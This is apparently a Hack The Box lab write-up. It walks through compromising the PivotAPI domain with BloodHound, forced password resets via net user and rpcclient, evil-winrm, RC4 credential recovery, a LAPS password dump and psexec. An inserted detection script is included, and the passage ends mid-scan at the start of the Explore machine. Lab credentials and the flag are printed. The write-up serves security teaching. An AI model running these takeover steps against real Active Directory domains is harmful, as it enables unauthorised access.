The command completed successfully.

So Developers really is one of the domain groups; let's see which users are in it:

PS C:\Developers> net group Developers /domain
Group Name     Developers
Comment

Members

-------------------------------------------------------------------------------
jari                     superfume
The command completed successfully.

More unfamiliar names. We can go back to BloodHound and see whether it shows a new exploitation path; first the attack paths involving the Developers group:
[screenshot: 2024-02-08-13-14-13]
This lists the permission relationships between users and the membership of superfume in the Developers group, so before we can access the contents of the Developers folder we have to follow these relationships until we end up with superfume's privileges. For example, 3V4SI0N has ownership of the DR.ZAIUSS user, so we can try to change DR.ZAIUSS's password, which amounts to getting a shell as DR.ZAIUSS, i.e. lateral movement:

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net user dr.zaiuss cvestone!666
The command completed successfully.

However, SSH as DR.ZAIUSS does not work:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# ssh dr.zaiuss@10.129.228.115             
dr.zaiuss@10.129.228.115's password: 
Permission denied, please try again.
dr.zaiuss@10.129.228.115's password: 

But besides SSH we still have evil-winrm; in another window run:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# proxychains evil-winrm -i 127.0.0.1 -u dr.zaiuss -p 'cvestone!666'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
[proxychains] Dynamic chain  ...  127.0.0.1:1337  ...  127.0.0.1:5985  ...  OK
*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents> net user superfume cvestone!666
Se ha completado el comando correctamente.

*Evil-WinRM* PS C:\Users\Dr.Zaiuss\Documents> 

In the same way we changed superfume's password and thereby obtained that user's privileges. If it fails, be patient and retry a few times, and be quick, because note.txt has already told us the proxied connection is unstable. After trying, superfume cannot SSH in either, so we keep using evil-winrm:

*Evil-WinRM* PS C:\> cd Developers
*Evil-WinRM* PS C:\Developers> dir


    Directorio: C:\Developers


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         8/8/2020   7:26 PM                Jari
d-----         8/8/2020   7:23 PM                Superfume


*Evil-WinRM* PS C:\Developers> cd Jari
*Evil-WinRM* PS C:\Developers\Jari> dir


    Directorio: C:\Developers\Jari


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         8/8/2020   7:26 PM           3676 program.cs
-a----         8/8/2020   7:18 PM           7168 restart-mssql.exe


*Evil-WinRM* PS C:\Developers\Jari> download program.cs
                                        
Info: Downloading C:\Developers\Jari\program.cs to program.cs
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Developers\Jari> download restart-mssql.exe
                                        
Info: Downloading C:\Developers\Jari\restart-mssql.exe to restart-mssql.exe
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Developers\Jari> cd ..
*Evil-WinRM* PS C:\Developers> cd Superfume
*Evil-WinRM* PS C:\Developers\Superfume> dir
*Evil-WinRM* PS C:\Developers\Superfume> 

Two files downloaded.

Analysing program 2

Reading the .cs source, it appears to be the source code of the other program.
Check the exact type of the executable:

┌──(root㉿hunter)-[/home/…/Desktop/htb/PivotAPI/Developers]
└─# file restart-mssql.exe        
restart-mssql.exe: PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows, 2 sections

The program is .NET-based and its name resembles the first program's, so we guess that it leaks credentials in the same way as the first one, but first it has to be reverse engineered. A search for .NET reversing tools:
[screenshot: 2024-02-08-18-00-00]
In the end I chose to use dnSpy in a virtual machine:
[screenshot: 2024-02-09-17-23-23]

Code audit reveals leaked credentials

We audit the decompiled code together with the source code.
Decompiled:

// restart_oracle.Program
// Token: 0x06000001 RID: 1 RVA: 0x00002048 File Offset: 0x00000248
private static void Main()
{
	string value = "\r\n    ____            __             __                               __\r\n   / __ \\___  _____/ /_____ ______/ /_   ____ ___  ______________ _/ /\r\n  / /_/ / _ \\/ ___/ __/ __ `/ ___/ __/  / __ `__ \\/ ___/ ___/ __ `/ / \r\n / _, _/  __(__  ) /_/ /_/ / /  / /_   / / / / / (__  |__  ) /_/ / /  \r\n/_/ |_|\\___/____/\\__/\\__,_/_/   \\__/  /_/ /_/ /_/____/____/\\__, /_/   \r\n                                                             /_/      \r\n                                                 by @HelpDesk 2020\r\n\r\n";
	byte[] bytes = Encoding.ASCII.GetBytes("CR_is_a_crybaby");
	byte[] data = new byte[]
	{
		66,
		180,
		137,
		236,
		54,
		46,
		36,
		97,
		214,
		48,
		90,
		72,
		24,
		83
	};
	byte[] array = Program.RC4.Decrypt(bytes, data);
	Console.WriteLine(value);
	Thread.Sleep(5000);
	Process process = new Process();
	SecureString secureString = new SecureString();
	process.StartInfo.FileName = "c:\\windows\\syswow64\\cmd.exe";
	process.StartInfo.Arguments = "/c sc.exe stop SERVICENAME ; sc.exe start SERVICENAME";
	process.StartInfo.RedirectStandardOutput = true;
	process.StartInfo.UseShellExecute = false;
	process.StartInfo.UserName = "Jari";
	string text = "";
	for (int i = 0; i < text.Length; i++)
	{
		secureString.AppendChar(text[i]);
	}
	process.StartInfo.Password = secureString;
	process.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
}

Source code:

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Threading;

namespace restart_oracle
{
    class Program
    {
        public class RC4
        {

            public static byte[] Encrypt(byte[] pwd, byte[] data)
            {
                int a, i, j, k, tmp;
                int[] key, box;
                byte[] cipher;

                key = new int[256];
                box = new int[256];
                cipher = new byte[data.Length];

                for (i = 0; i < 256; i++)
                {
                    key[i] = pwd[i % pwd.Length];
                    box[i] = i;
                }
                for (j = i = 0; i < 256; i++)
                {
                    j = (j + box[i] + key[i]) % 256;
                    tmp = box[i];
                    box[i] = box[j];
                    box[j] = tmp;
                }
                for (a = j = i = 0; i < data.Length; i++)
                {
                    a++;
                    a %= 256;
                    j += box[a];
                    j %= 256;
                    tmp = box[a];
                    box[a] = box[j];
                    box[j] = tmp;
                    k = box[((box[a] + box[j]) % 256)];
                    cipher[i] = (byte)(data[i] ^ k);
                }
                return cipher;
            }

            public static byte[] Decrypt(byte[] pwd, byte[] data)
            {
                return Encrypt(pwd, data);
            }

            public static byte[] StringToByteArray(String hex)
            {
                int NumberChars = hex.Length;
                byte[] bytes = new byte[NumberChars / 2];
                for (int i = 0; i < NumberChars; i += 2)
                    bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16);
                return bytes;
            }

        }

        static void Main()
        {
        
            string banner = @"
    ____            __             __                               __
   / __ \___  _____/ /_____ ______/ /_   ____ ___  ______________ _/ /
  / /_/ / _ \/ ___/ __/ __ `/ ___/ __/  / __ `__ \/ ___/ ___/ __ `/ / 
 / _, _/  __(__  ) /_/ /_/ / /  / /_   / / / / / (__  |__  ) /_/ / /  
/_/ |_|\___/____/\__/\__,_/_/   \__/  /_/ /_/ /_/____/____/\__, /_/   
                                                             /_/      
                                                 by @HelpDesk 2020

";
            byte[] key = Encoding.ASCII.GetBytes("");
            byte[] password_cipher = { };
            byte[] resultado = RC4.Decrypt(key, password_cipher);
            Console.WriteLine(banner);
            Thread.Sleep(5000);
            System.Diagnostics.Process psi = new System.Diagnostics.Process();
            System.Security.SecureString ssPwd = new System.Security.SecureString();
            psi.StartInfo.FileName = "c:\\windows\\syswow64\\cmd.exe";
            psi.StartInfo.Arguments = "/c sc.exe stop SERVICENAME ; sc.exe start SERVICENAME";
            psi.StartInfo.RedirectStandardOutput = true;
            psi.StartInfo.UseShellExecute = false;
            psi.StartInfo.UserName = "Jari";
            string password = "";
            for (int x = 0; x < password.Length; x++)
            {
               ssPwd.AppendChar(password[x]);
            }
            password = "";
            psi.StartInfo.Password = ssPwd;
            psi.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
            psi.Start();

        }
    }
}

Code audit analysis:

Generally, credentials may leak through console output statements, so we set a breakpoint at Console.WriteLine(value); and inspect the data held in memory at that point. We did indeed find the leaked password, and since the source has psi.StartInfo.UserName = "Jari"; and the file was in Jari's directory, we know this password belongs to Jari:
[screenshot: 2024-02-09-17-27-41]
[screenshot: 2024-02-09-17-28-49]
So record the new credential Jari:Cos@Chung@!RPG in our notes file.
SSH still fails with this credential, but connecting through evil-winrm succeeds. This time, though, we can also look for other open APIs to use, because WinRM over the proxy is too unstable; re-reading tcpdetails.nmap shows there is also an msrpc service we can try:
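The breakpoint approach above recovers the password from memory, but the audit also shows why the "protection" is worthless: the RC4 key and the ciphertext are both embedded in the same binary. The following is an added example, not code from the write-up or from the target program: a Python port of the RC4 routine in program.cs, applied to the key and byte array that dnSpy exposed in restart-mssql.exe, so the credential can be recovered offline without a debugger.

```python
# Added example: Python port of restart_oracle.Program.RC4 from program.cs,
# run against the key and ciphertext recovered from restart-mssql.exe.
# This is not the write-up's own code; it reimplements the routine the audit found.


def rc4(key: bytes, data: bytes) -> bytes:
    """Port of Program.RC4.Encrypt. RC4 is symmetric, so Decrypt() is the same call."""
    # Key-scheduling: the C# code fills key[i] = pwd[i % pwd.Length], box[i] = i,
    # then swaps box entries driven by j = (j + box[i] + key[i]) % 256.
    box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + box[i] + key[i % len(key)]) % 256
        box[i], box[j] = box[j], box[i]

    # Keystream generation, mirroring the a / j / k loop in the C# source.
    out = bytearray()
    a = j = 0
    for byte in data:
        a = (a + 1) % 256
        j = (j + box[a]) % 256
        box[a], box[j] = box[j], box[a]
        k = box[(box[a] + box[j]) % 256]
        out.append(byte ^ k)
    return bytes(out)


# Constants exactly as they appear in the decompiled Main() shown above.
EMBEDDED_KEY = b"CR_is_a_crybaby"
EMBEDDED_CIPHERTEXT = bytes([66, 180, 137, 236, 54, 46, 36, 97, 214, 48, 90, 72, 24, 83])


def recover_embedded_password(key: bytes = EMBEDDED_KEY,
                              ciphertext: bytes = EMBEDDED_CIPHERTEXT) -> str:
    """Do what Main() does before it feeds the result into a SecureString."""
    return rc4(key, ciphertext).decode("ascii")


if __name__ == "__main__":
    # The embedded key and blob together yield the plaintext credential for Jari.
    print(recover_embedded_password())
```

The same hard-coded-key pattern was what leaked the first program's credential, which is a useful thing to flag in any code review: a SecureString built from a string the binary itself decrypts protects nothing.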

This target sits in a domain environment: once we have one shell we move laterally to other shells and can hop back and forth between them, which is pivoting, and since more than one open API is available to connect through, I believe that is where the challenge name PivotAPI comes from.

pivot by msrpc

Before that, look at user Jari's properties:
[screenshot: 2024-02-09-21-57-57]
Under outbound object control we find that this user can force a password change on two other users.
So in a new window try connecting over MSRPC; it has many uses, and we can use it to change passwords:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U 'Jari%Cos@Chung@!RPG' 10.129.228.115
rpcclient $> setuserinfo2 help                                                            
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 gibdeon 23 'cvestone!666'
rpcclient $> 

We can verify the change with crackmapexec:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb 10.129.228.115 -u gibdeon -p 'cvestone!666'
SMB         10.129.228.115  445    PIVOTAPI         [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB         10.129.228.115  445    PIVOTAPI         [+] LicorDeBellota.htb\gibdeon:cvestone!666 

The + shows it succeeded.

Using BloodHound to find more attack paths in the domain

Now look at user gibdeon's properties:
[screenshot: 2024-02-09-22-21-56]
Under first-degree group membership we find this user is in the Domain Users and Account Operators groups.
Look at the Domain Users group in detail:
[screenshot: 2024-02-09-22-25-51]
It has no outbound objects it directly controls:
[screenshot: 2024-02-09-22-27-49]
The Account Operators group, however, directly controls many outbound objects:
[screenshot: 2024-02-09-22-29-36]
In such a complex domain the number of objects is overwhelming, but always keep our ultimate goal in mind: taking over Domain Admins! So we can again use BloodHound to show the shortest attack path to Domain Admins:
[screenshot: 2024-02-09-22-40-39]
[screenshot: 2024-02-09-22-47-48]
For instance, starting from the targets we already own (marked with 💀️), it shows that PSRemote can be tried.

Using LAPS to obtain domain administrator credentials

First go back to the stable SSH session we already have and look at the domain groups in detail:

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups /domain

Group Accounts for \\PIVOTAPI

-------------------------------------------------------------------------------
*Key Administrators
*Organization Key Administrators
*Enterprise Administrators
*Schema Administrators
*Domain Admins
*Domain Controllers
*Cloneable Domain Controllers
*Read-only Domain Controllers
*Developers
*DnsUpdateProxy
*Enterprise Read-only Domain Controllers
*Domain Computers
*Domain Guests
*LAPS ADM
*LAPS READ
*Group Policy Creator Owners
*Protected Users
*Domain Users
*WinRM
The command completed successfully.

Of these, LAPS ADM and LAPS READ are the groups we are most interested in.

LAPS ADM and LAPS READ are groups related to privilege escalation. LAPS stands for Local Administrator Password Solution, a Microsoft tool that automatically manages and rotates the local administrator password of computers. The purpose of these two groups is to control access to LAPS functionality.
The LAPS ADM group is typically used to grant users the right to manage and change computers' local administrator passwords; members can use LAPS to reset, change and view them.
The LAPS READ group is typically used to grant users the right to view computers' local administrator passwords without being able to change or reset them. This is usually for security teams or other specific roles that need to monitor or audit local administrator passwords.

If we get hold of a LAPS READ member, that is effectively administrator privileges in the domain. Look at the members of these two groups:

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups "LAPS READ" /domain

Group Name     LAPS READ
Comment

Members

-------------------------------------------------------------------------------
cybervaca                lothbrok
The command completed successfully.

licordebellota\3v4si0n@PIVOTAPI C:\Users\3v4Si0N>net groups "LAPS ADM" /domain

Group Name     LAPS ADM
Comment

Members

-------------------------------------------------------------------------------
cybervaca
The command completed successfully.

So of these two groups, user cybervaca has the highest privileges. Going back to the earlier BloodHound graph of objects directly controlled by Account Operators, we find it has full control over lothbrok but not over cybervaca, so we can change lothbrok's password through gibdeon. This attack path is easier than the others, so try it:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# rpcclient -U 'gibdeon%cvestone!666' 10.129.229.178
rpcclient $> setuserinfo2 lothbrok 23 'cvestone.com666'
rpcclient $> 

With lothbrok taken, we can next use a tool to read the LAPS password; searching for tools:
[screenshot: 2024-02-10-20-07-12]
Run the script:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# python3 dump_laps.py -u lothbrok -p cvestone.com666 -d LicorDebellota.htb -l 10.129.229.178
LAPS Dumper - Running at 02-10-2024 20:29:27
PIVOTAPI 2UF4969F52FbRvF2tap0

We now have the domain administrator's credential; verify it:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# crackmapexec smb 10.129.229.178 -u Administrador -p '2UF4969F52FbRvF2tap0'
SMB         10.129.229.178  445    PIVOTAPI         [*] Windows 10.0 Build 17763 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB         10.129.229.178  445    PIVOTAPI         [+] LicorDeBellota.htb\Administrador:2UF4969F52FbRvF2tap0 (Pwn3d!)

And the Pwn3d! marker shows we have really taken this machine.

Be careful here: because this machine's language is not English, the administrator account name is different (Administrador rather than Administrator); this can be checked with net user.

The question now is how to get a shell as the domain administrator. We can first check in BloodHound whether the service groups seen earlier include the domain administrator:
[screenshot: 2024-02-10-20-39-50]
[screenshot: 2024-02-10-20-40-51]
Clearly neither of them does.

Using psexec to get a domain administrator shell

In this situation we can also try psexec from the impacket suite:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py Administrador:'2UF4969F52FbRvF2tap0'@10.129.229.178              
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.229.178.....
[*] Found writable share ADMIN$
[*] Uploading file TweoOztV.exe
[*] Opening SVCManager on 10.129.229.178.....
[*] Creating service glyR on 10.129.229.178.....
[*] Starting service glyR.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [Versi�n 10.0.17763.1879]

(c) 2018 Microsoft Corporation. Todos los derechos reservados.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

So if a shell can be obtained this way, why didn't we consider it earlier? Because the earlier users lacked the required privileges, which is why this connection method is usually not the first choice, as shown below:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py Jari:'Cos@Chung@!RPG'@10.129.229.178
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.229.178.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
    
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py 3v4Si0N:'Gu4nCh3C4NaRi0N!23'@10.129.229.178
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.229.178.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
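From the defender's side, the psexec.py run above leaves a very recognisable trace: a service with a 4-letter random name (glyR) whose binary is an 8-letter random executable (TweoOztV.exe) uploaded to ADMIN$, recorded in the System log as Event ID 7045. The following Python detection is an added example (not code from the write-up or from Impacket) run over constructed 7045 records; the exact image-path forms it accepts (%SystemRoot%\ or a UNC path to the share) are an assumption.

```python
import re
from typing import Dict, List

# Naming scheme observed in the psexec.py session above: a 4-letter random
# service name (glyR) and an 8-letter random executable name (TweoOztV.exe).
RANDOM_SERVICE_NAME = re.compile(r"^[A-Za-z]{4}$")
RANDOM_BINARY_NAME = re.compile(r"^[A-Za-z]{8}\.exe$")

# Assumption (not stated on the page): the service binary is registered under
# %SystemRoot% when the upload went to ADMIN$, or under a UNC path to the
# writable share otherwise. Both forms are accepted here.
IMAGE_PATH_FORMS = re.compile(
    r"^(?:%SystemRoot%|\\\\[^\\]+\\(?:ADMIN\$|C\$))\\(?P<binary>[^\\]+)$",
    re.IGNORECASE,
)


def looks_like_psexec_service(event: Dict[str, str]) -> bool:
    """True for a System log 7045 (service installed) record whose service
    name and image path both follow the psexec.py naming scheme."""
    if event.get("EventID") != "7045":
        return False
    match = IMAGE_PATH_FORMS.match(event.get("ImagePath", ""))
    if match is None:
        return False
    return bool(
        RANDOM_SERVICE_NAME.match(event.get("ServiceName", ""))
        and RANDOM_BINARY_NAME.match(match.group("binary"))
    )


def find_psexec_installs(events: List[Dict[str, str]]) -> List[str]:
    """Service names of every record flagged as a psexec-style install."""
    return [e["ServiceName"] for e in events if looks_like_psexec_service(e)]


# Constructed sample records; field names follow the 7045 EventData layout.
# The first one mirrors the psexec.py run shown above.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "7045", "ServiceName": "glyR",
     "ImagePath": "%SystemRoot%\\TweoOztV.exe",
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    # Legitimate install: descriptive name, vendor path -> not flagged.
    {"EventID": "7045", "ServiceName": "Sysmon64",
     "ImagePath": "C:\\Windows\\Sysmon64.exe",
     "ServiceType": "user mode service", "StartType": "auto start",
     "AccountName": "LocalSystem"},
    # Short name but a normal path -> not flagged.
    {"EventID": "7045", "ServiceName": "Wsvc",
     "ImagePath": "C:\\Program Files\\Vendor\\wsvc.exe",
     "ServiceType": "user mode service", "StartType": "auto start",
     "AccountName": "LocalSystem"},
    # Same scheme via a UNC path to the share -> flagged.
    {"EventID": "7045", "ServiceName": "mNop",
     "ImagePath": "\\\\127.0.0.1\\ADMIN$\\abcdEFGH.exe",
     "ServiceType": "user mode service", "StartType": "demand start",
     "AccountName": "LocalSystem"},
    # Random-looking names in a 7036 (state change) record are ignored.
    {"EventID": "7036", "ServiceName": "zzzz",
     "ImagePath": "%SystemRoot%\\aaaabbbb.exe"},
]


if __name__ == "__main__":
    for name in find_psexec_installs(SAMPLE_EVENTS):
        print(f"[!] psexec-style service install: {name}")
```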

However, we do not find the final flag in this domain administrator's home directory or Desktop:

C:\Windows\system32> cd c:\users\Administrador

c:\Users\administrador> cd Desktop

c:\Users\administrador\Desktop> dir
 El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
 El n�mero de serie del volumen es: 94DB-AFCA


 Directorio de c:\Users\administrador\Desktop

28/04/2021  22:36    <DIR>          .
28/04/2021  22:36    <DIR>          ..
               0 archivos              0 bytes
               2 dirs   4.520.017.920 bytes libres

c:\Users\administrador\Desktop> cd ..

c:\Users\administrador> dir
 El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
 El n�mero de serie del volumen es: 94DB-AFCA


 Directorio de c:\Users\administrador

11/08/2020  16:32    <DIR>          .
11/08/2020  16:32    <DIR>          ..
09/08/2020  16:06    <DIR>          3D Objects
09/08/2020  16:06    <DIR>          Contacts
28/04/2021  22:36    <DIR>          Desktop
09/08/2020  16:06    <DIR>          Documents
10/08/2020  17:21    <DIR>          Downloads
09/08/2020  16:06    <DIR>          Favorites
09/08/2020  16:06    <DIR>          Links
09/08/2020  16:06    <DIR>          Music
09/08/2020  16:06    <DIR>          Pictures
09/08/2020  16:06    <DIR>          Saved Games
09/08/2020  16:06    <DIR>          Searches
09/08/2020  16:06    <DIR>          Videos
               0 archivos              0 bytes
              14 dirs   4.520.017.920 bytes libres

But recalling that in the LAPS-related groups the user cybervaca has nearly administrator-level privileges, it is worth checking that user too; and this username happens to be the machine's author ^w^

c:\Users\administrador> cd ..\cybervaca\Desktop

c:\Users\cybervaca\Desktop> dir
 El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
 El n�mero de serie del volumen es: 94DB-AFCA


 Directorio de c:\Users\cybervaca\Desktop

30/04/2021  09:31    <DIR>          .
30/04/2021  09:31    <DIR>          ..
10/02/2024  13:19                34 root.txt
               1 archivos             34 bytes
               2 dirs   4.520.226.816 bytes libres

c:\Users\cybervaca\Desktop> type root.txt
9f91a2b8bdfab265d51b101db6fe3dc8

The final flag is 9f91a2b8bdfab265d51b101db6fe3dc8

Further exploration

(pending)

Summary

(to be written after the review)

Explore

Study notes on "Red Team Notes"

Machine introduction

Explore is an easy difficulty Android machine. Network enumeration reveals a vulnerable service that is exploitable via a Metasploit module, and gives restricted read access to the machine. Further enumeration of the files, reveals the SSH credentials of a system user, allowing this way remote access to the machine. Finally, the attacker is able to forward a filtered port locally using SSH tunneling, in order to access the Android shell over the Android Debug Bridge (ADB). This eventuality allows the attacker to execute commands as the root user.

Difficulty

Easy

Information gathering

Full TCP port scan:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sT --min-rate 10000 -p- $ip1 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-12 16:17 CST
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 11.98% done; ETC: 16:18 (0:01:13 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 26.79% done; ETC: 16:18 (0:01:03 remaining)
Nmap scan report for 10.129.230.80 (10.129.230.80)
Host is up (0.19s latency).
All 65535 scanned ports on 10.129.230.80 (10.129.230.80) are in ignored states.
Not shown: 64652 filtered tcp ports (no-response), 883 closed tcp ports (conn-refused)

Nmap done: 1 IP address (1 host up) scanned in 87.29 seconds
              
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --min-rate 10000 -p- 10.129.178.12 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:32 CST
Warning: 10.129.178.12 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.29s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE    SERVICE
2222/tcp  open     EtherNetIP-1
5555/tcp  filtered freeciv
15262/tcp filtered unknown
30972/tcp filtered unknown
32708/tcp filtered unknown
33415/tcp filtered unknown
35169/tcp open     unknown
42135/tcp open     unknown
59777/tcp open     unknown
62324/tcp filtered unknown
64451/tcp filtered unknown

Nmap done: 1 IP address (1 host up) scanned in 12.24 seconds

Here I tried both with and without -sT; with -sT the scan actually found nothing, so nmap scanning is not rigid and it pays to try several variants.
Filter the ports out of the result and process them for later use:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ports=$(grep /tcp nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')     
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# echo $ports  
2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451

Detailed TCP scan:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sT -sC -sV -O -p 2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451 10.129.178.12 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:50 CST
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.24s latency).

PORT      STATE    SERVICE VERSION
2222/tcp  open     ssh     (protocol 2.0)
| ssh-hostkey: 
|_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-SSH Server - Banana Studio
5555/tcp  filtered freeciv
15262/tcp closed   unknown
30972/tcp closed   unknown
32708/tcp closed   unknown
33415/tcp closed   unknown
35169/tcp closed   unknown
42135/tcp open     http    ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
62324/tcp closed   unknown
64451/tcp closed   unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.94SVN%I=7%D=2/20%Time=65D44BD2%P=x86_64-pc-linux-gnu%r
SF:(NULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/20%OT=2222%CT=15262%CU=44075%PV=Y%DS=2%DC=I%G=Y%T
OS:M=65D44BEB%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%TS=C)SEQ(SP=105%GCD=1%ISR=109%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST
OS:11NW6%O2=M53CST11NW6%O3=M53CNNT11NW6%O4=M53CST11NW6%O5=M53CST11NW6%O6=M5
OS:3CST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%
OS:T=40%W=FFFF%O=M53CNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
OS:T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Device: phone

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.12 seconds

UDP scan:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sU --top-ports 1000 10.129.178.12 -oA nmapscan/udpors
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:24 CST
Stats: 0:04:10 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 25.70% done; ETC: 14:40 (0:12:03 remaining)
Stats: 0:04:11 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 25.70% done; ETC: 14:40 (0:12:06 remaining)
Stats: 0:14:35 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 79.06% done; ETC: 14:43 (0:03:52 remaining)
Stats: 0:18:55 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
